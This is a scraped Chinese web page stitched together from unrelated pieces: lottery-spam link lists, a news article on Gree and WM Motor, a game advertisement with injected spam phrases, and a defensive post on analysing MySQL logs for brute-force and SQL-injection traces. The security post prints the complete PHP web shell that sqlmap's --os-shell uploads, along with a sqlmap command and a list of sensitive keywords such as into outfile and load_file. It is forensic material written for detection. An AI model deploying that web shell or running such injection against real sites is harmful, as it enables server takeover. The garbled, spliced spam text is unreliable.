• 在战火中诞生的党中央机关报(连载八) 2019-09-19
  • 惊险!司机驾车撞穿墙壁 “飞”下二楼 2019-09-15
  • 她说桂花香,他们就摘光了那棵桂花树,送给她 2019-09-15
  • 毕业当援疆 去祖国最需要的地方 2019-09-13
  • 浙江消防志愿者小区“巡防” 携手居民共建“安全网” 2019-09-07
  • 2018“文化和自然遗产日”非遗影像展:电影《侗族大歌》观众流泪观影——晋中频道 2019-09-06
  • 红网定位党网 首页改版上线打造“五大平台” 2019-09-06
  • 2019年篮球世界杯筹备工作全面提速 2019-09-01
  • 发展特色产业 带动农民增收致富 2019-08-31
  • Steam中国版真要来了 今后还能愉快喜“+1”吗 2019-08-31
  • 档案看西藏 拉萨市开展档案宣传教育活动 2019-08-27
  • 中国田径应把握项目变革的机遇(体坛观澜) 2019-08-27
  • 联想参展CES Aisa 2018,众多黑科技产品悉数亮相 2019-08-26
  • 21岁CEO为留学生做“安保” 2019-08-26
  • GreatNews The Intelligent RSS Reader 2019-08-17
  • 河北福彩排列五:诗名句

    格雷电气有限公司与威曼登女士携手“喝醉”或“不造车”

    河北福利彩票排列七 www.kqtcc.com

        从董女士的许多公开声明中,她似乎并不后悔进入新能源汽车领域。外界经常忽视的是,董明珠女士在几次公开场合也表示,格力集团与新能源汽车在业务和产品层面存在许多“整合”,这可能不是真的。只是文字而已。

        财经美联社(广东,记者徐学成)消息,随着珠海银龙的“前车之鉴”,格力电器(000651.sz)与威马车牵手的消息尤为引人注目。根据公开信息,双方将在“车辆制造相关、高端设备输出等方面开展深入合作”。这种合作被外界视为实现董小姐造车梦想的又一次尝试。但据财经美联社记者了解,至少到目前为止,格力电气的核心诉求不是造一辆车,而是布置近年来的汽车空调和新能源领域。

    cai jing mei lian she guang dong, ji zhe xu xue cheng xiao xi, sui zhe zhu hai yin long de" qian che zhi jian", ge li dian qi 000651. sz yu wei ma che qian shou de xiao xi you wei yin ren zhu mu. gen ju gong kai xin xi, shuang fang jiang zai" che liang zhi zao xiang guan gao duan she bei shu chu deng fang mian kai zhan shen ru he zuo". zhe zhong he zuo bei wai jie shi wei shi xian dong xiao jie zao che meng xiang de you yi ci chang shi. dan ju cai jing mei lian she ji zhe liao jie, zhi shao dao mu qian wei zhi, ge li dian qi de he xin su qiu bu shi zao yi liang che, er shi bu zhi jin nian lai de qi che kong tiao he xin neng yuan ling yu.

        再上车吧

        近日,格力电气与威马汽车签署战略合作协议。双方将在智能制造、车辆智能互联等相关领域,以及车辆制造相关、高端设备输出等方面开展深入合作。

        这至少是近年来格力电气第二次与新能源汽车制造商建立“关系”。

        早在2016年8月,格力电气就提出了一项资产收购计划,交易对价高达130亿元,计划收购珠海银龙100%的股权。这个计划一公布,就引起了很大的骚动。一直在建设“良好空调”的灰色电器,应该加入汽车制造行列吗?当时外界并不欣赏这一点。

        由于中小股东强烈反对,收购计划最终未能实施。但董明珠并没有就此止步。此后,她以自己的名义成为珠海银龙第二大股东。2017年,格力电气还与珠海银龙签订了合作协议,年采购额达200亿元。有一段时间,外界似乎认为董明珠和格力电器决心制造汽车。

        但从那以后,“借来”股份的“董小姐”就没有达到预期的效果。在珠海投资银龙后,公司的质量、财务、管理等问题频发。几名股东因涉嫌损害公司利益而入狱。董小姐与珠海银龙原股东之间的“骂战”也成为一个热门话题。2018年12月,在一次公开活动上,董明珠甚至直言不讳地说:“银龙就是洞”。

        在这种背景下,格力电器与威马汽车的合作得到了更多的“内容”——珠海银龙已经有了“过去的教训”,为什么“董小姐”还那么热爱汽车制造?

        从董女士的许多公开声明中,她似乎并不后悔进入新能源汽车领域。外界经常忽视的是,董明珠女士在几次公开场合也表示,格力集团与新能源汽车在业务和产品层面存在许多“整合”,这可能不是真的。只是文字而已。

        醉汉的意义

        格力电气一位知情人士8月28日对英国《金融时报》表示:“格力电气收购珠海银龙的初衷并非所谓的“汽车大厦”,但对“汽车大厦”的解读更有可能引起外界的关注?!?/p>

        然而,一位不愿透露姓名的新能源汽车资深从业人员表示,如果在零部件或某些技术方面有合作,就有可能,“但整车技术,门槛很高,不是说你想进入就可以进入?!?/p>

        格力电器传统上是以空调为主的家电企业。但事实上,到目前为止,格力电器的业务已经涉及到空调、家电、高端设备和通讯设备。根据格力电器2018年年报,空调产品占公司营业收入的比例从2017年的83.22%下降到了78.58%,家用电器、智能设备等主要产品占公司营业收入的比例增加了1%。不同利润率。在解释公司的发展战略时,格力电气表示将“稳步扩大智能设备等新产业”。

    当前文章://www.kqtcc.com/bookstore/quanbu/default-0-0-0-0-2-0-1.html

    发布时间:00:07:50


    {相关文章}

    你见过黑色??秃统豆蔷槁??《西游记》立体版开启你的第二人生!

        你见过用拳头安慰她的直人??吐??你见过一个长着鼻孔的骷髅精灵看着人们走一条又甜又酷的路线吗?生命是无限的?!段饔渭恰妨⑻灏嫖昵嵯揽吞峁┝宋尴蘅赡堋桓龈叨茸杂傻娜宋锬罅诚低?、一个超级丰富的职业体系和一个更杜海涛的资料_环亚资讯网加智能化的人气系统,所以年轻的侠义人可以自由地成为他们想成为游戏中的人。

        自定义图像很容易突破尺寸墙。

        很多年轻的侠客可能想过让自己的游戏角色呈现出自己的气质特征。然而,面对形形色色的揉捏制度,许多残疾青年侠客的思想很难转化为现实。

        现在,三维版的梦幻西游将帮助你打破维度之墙!不仅可以用它的揉捏系统定制个性蒙昧是什么意思_环亚资讯网化的脸部,而且可以在游戏中上传正面图片,这样系统可以帮助自己生成排他性的主角脸。

        姐妹冰淇淋

        霸道的姐姐

        别这么天真地看着我!

        楚楚可怜的儿子

        运用动态表情捕捉技术,主人公也能感受到喜悦、愤怒和悲伤。让年轻的侠客从现实世全球使命配置_环亚资讯网界走向游戏,开启他们的第二人生!

        你扮演各种各样的社会角色。

        在人物形象出现后,young Xia可以进入游戏体验三个领域的风俗习惯。其中,青年骑士不仅可以选择加入某一所学校,学习武术,增强自身实力,而且在各种社会职业中发挥作用。只要青年骑士愿意,他们可以深入民间,体验这些职业,以新的面貌走上街头和小巷。

        尽职的保镖dnf赫拉斯_环亚资讯网

        做一个善恶相待的绿林英雄

        文官要与何志章思考如何平衡民生与税收

        随着战争的成功,人气会上升。

        除恶扬善、保卫国家是军官的职责。

        善恶随其心,言行皆有因果。

        在三维版的《西游记》中,人气会直接影响到年轻侠客的游戏体验。选择行善的方式,年轻的侠义,走在路上,会得到三国生活的温柔等待。另外,年轻侠义的人气越高,就越容易引发一些罕见的冒险活动,更多地了解这三大秘密。如果年轻的侠义战士经常闹事,他们不仅会被路人看不起,小人得志 君子道消_环亚资讯网禁止参加某些活动,还可能被官兵追得鸡飞狗跳!因此,虽然年轻骑士精神可以自由选择在游戏中成为人的方式,但走三条界限的最佳方式是遵循善。

        “三维”在“三维西游记”一词中不仅指游戏画面的升级,而且意味着每一位年轻的武士都能欣赏到游戏中三个方面的各个方面更为立体化。从外表到职业再到善感恩教育活动总结_环亚资讯网恶,《西游记》立体版给了年轻侠客一个多变的选择。如果你还想体验生活世界的方方面面,不妨去官网预约一下游戏,第一时间和朋友一起开启新的三界冒险!

        [来源:官方]

    2019-06-20 3,995

    常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等。对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景及追溯攻击源。

    0x01 Mysql日志分析

    general query log能记录成功连接和每次执行的查询,我们可以将它用作安全布防的一部分,为故障分析或黑客事件后的调查提供依据。

    1、查看log配置信息

    show variables like '%general%';

    2、开启日志

    SET GLOBAL general_log = 'On';

    3、指定日志文件路径

    SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';

    比如,当我访问 /test.php?id=1,此时我们得到这样的日志:

    190604 14:46:14       14 Connect    [email protected] on
                          14 Init DB    test   
                          14 Query    SELECT * FROM admin WHERE id = 1     
                          14 Quit

    我们按列来解析一下:

    第一列:Time,时间列,前面一个是日期,后面一个是小时和分钟,有一些不显示的原因是因为这些sql语句几乎是同时执行的,所以就不另外记录时间了。
    第二列:Id,就是show processlist出来的第一列的线程ID,对于长连接和一些比较耗时的sql语句,你可以精确找出究竟是那一条那一个线程在运行。
    第三列:Command,操作类型,比如Connect就是连接数据库,Query就是查询数据库(增删查改都显示为查询),可以特定过虑一些操作。
    第四列:Argument,详细信息,例如 Connect    [email protected] on 意思就是连接数据库,如此类推,接下面的连上数据库之后,做了什么查询的操作。

    0x02 登录成功/失败

    我们来做个简单的测试吧,使用我以前自己开发的弱口令工具来扫一下,字典设置比较小,2个用户,4个密码,共8组。

    MySQL中的log记录是这样子:

    Time                 Id        Command         Argument
    190601 22:03:20     98 Connect  [email protected] on
            98 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
            103 Connect  [email protected] on       
            103 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            104 Connect  [email protected] on       
            104 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Connect  [email protected] on       
            101 Connect  [email protected] on       
            101 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)       
            99 Connect  [email protected] on        
            99 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
            105 Connect  [email protected] on       
            105 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Query  set autocommit=0      
            102 Connect  [email protected] on       
            102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Quit


    你知道在这个口令猜解过程中,哪个是成功的吗?

    利用爆破工具,一个口令猜解成功的记录是这样子的:

    190601 22:03:20     100 [email protected] on
       100 Queryset autocommit=0   
       100 Quit


    但是,如果你是用其他方式,可能会有一点点不一样的哦。

    Navicat for MySQL登录:

    190601 22:14:07  106 [email protected] on         
             106 QuerySET NAMES utf8
             106 QuerySHOW VARIABLES LIKE 'lower_case_%'         
             106 QuerySHOW VARIABLES LIKE 'profiling'         
             106 QuerySHOW DATABASES

    命令行登录:

    190601 22:17:25  111 [email protected] on
             111 Queryselect @@version_comment limit 1
             190601 22:17:56  111 Quit

    这个差别在于,不同的数据库连接工具,它在连接数据库初始化的过程中是不同的。通过这样的差别,我们可以简单判断出用户是通过连接数据库的方式。

    另外,不管你是爆破工具、Navicat for MySQL、还是命令行,登录失败都是一样的记录。

    登录失败的记录:

    102 Connect  [email protected] on 
    102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)

    利用shell命令进行简单的分析:

    有哪些IP在爆破?

    grep  "Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr
         27 192.168.204.1

    爆破用户名字典都有哪些?

    grep  "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -nr     13 mysql     12 root      1 root      1 mysql


    在日志分析中,特别需要注意一些敏感的操作行为,比如删表、备库,读写文件等。

    关键词:drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。
    敏感数据库表:SELECT * from mysql.user、SELECT * from mysql.func


    0x03 SQL注入入侵痕迹

    在利用SQL注入漏洞的过程中,我们会尝试利用sqlmap的--os-shell参数取得shell,如操作不慎,可能留下一些sqlmap创建的临时表和自定义函数。我们先来看一下sqlmap os-shell参数的用法以及原理:

    1、构造一个SQL注入点,开启Burp监听8080端口

    sqlmap.py  -u //192.168.204.164/sql.php?id=1 --os-shell --proxy=//127.0.0.1:8080

    HTTP通讯过程如下:

    创建了一个临时文件tmpbwyov.php,通过访问这个木马执行系统命令,并返回到页面展示。

    tmpbwyov.php:

    <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);[email protected]_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>`

    创建了一个临时表sqlmapoutput,调用存储过程执行系统命令将数据写入临时表,然后取临时表中的数据展示到前端。

    通过查看网站目录中最近新建的可疑文件,可以判断是否发生过sql注入漏洞攻击事件。


    检查方法:

    1、检查网站目录下,是否存在一些木马文件:

    2、检查是否有UDF提权、MOF提权痕迹

    检查目录是否有异常文件

    mysqllibpluginc:/windows/system32/wbem/mof/

    检查函数是否删除

    select * from mysql.func

    3、结合web日志分析。


    本文转自公众号:Bypass

    Tags: 、、、、、、、、、、、、、、
    评论  (0)
    快来写下你的想法吧!

    Bypass007

    文章数:22 积分: 78

    一个网络安全爱好者,对技术有着偏执狂一样的追求。

    安全问答社区

    脉搏官方公众号

    活动日程

  • 在战火中诞生的党中央机关报(连载八) 2019-09-19
  • 惊险!司机驾车撞穿墙壁 “飞”下二楼 2019-09-15
  • 她说桂花香,他们就摘光了那棵桂花树,送给她 2019-09-15
  • 毕业当援疆 去祖国最需要的地方 2019-09-13
  • 浙江消防志愿者小区“巡防” 携手居民共建“安全网” 2019-09-07
  • 2018“文化和自然遗产日”非遗影像展:电影《侗族大歌》观众流泪观影——晋中频道 2019-09-06
  • 红网定位党网 首页改版上线打造“五大平台” 2019-09-06
  • 2019年篮球世界杯筹备工作全面提速 2019-09-01
  • 发展特色产业 带动农民增收致富 2019-08-31
  • Steam中国版真要来了 今后还能愉快喜“+1”吗 2019-08-31
  • 档案看西藏 拉萨市开展档案宣传教育活动 2019-08-27
  • 中国田径应把握项目变革的机遇(体坛观澜) 2019-08-27
  • 联想参展CES Aisa 2018,众多黑科技产品悉数亮相 2019-08-26
  • 21岁CEO为留学生做“安保” 2019-08-26
  • GreatNews The Intelligent RSS Reader 2019-08-17
  • 25选7走势图杀号 2005七乐彩走势图 福彩彩吧论坛三天计划 吉林快3开奖网址 河南22选5开奖走势图500期 2019意甲直播 重庆百变王牌微信群 福彩3d字谜 河北快3万能码走势图 甘肃十一选五任5遗漏 七星彩开奖直播竟彩网 支付宝爱彩网 彩票销售管理办法 澳洲幸运5开奖走势图 内蒙古十一选五手机套